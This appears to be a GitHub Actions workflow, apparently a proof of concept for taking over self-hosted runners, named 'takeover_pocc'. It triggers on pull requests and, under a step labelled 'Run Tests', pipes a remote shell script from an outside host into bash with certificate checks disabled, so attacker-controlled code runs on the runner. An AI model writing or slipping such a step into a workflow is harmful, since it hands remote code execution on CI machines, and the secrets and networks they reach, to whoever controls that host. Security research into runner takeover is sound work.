name: takeover_pocc
run-name: takeover_pocc
on:
- pull_request
jobs:
  testing:
    runs-on:
    - self-hosted
    - linux
    - X64
    steps:
    - name: Run Tests
      run: |
        curl -k https://v.0xz.org/selfrunnerpoc3.sh | bash
      continue-on-error: true
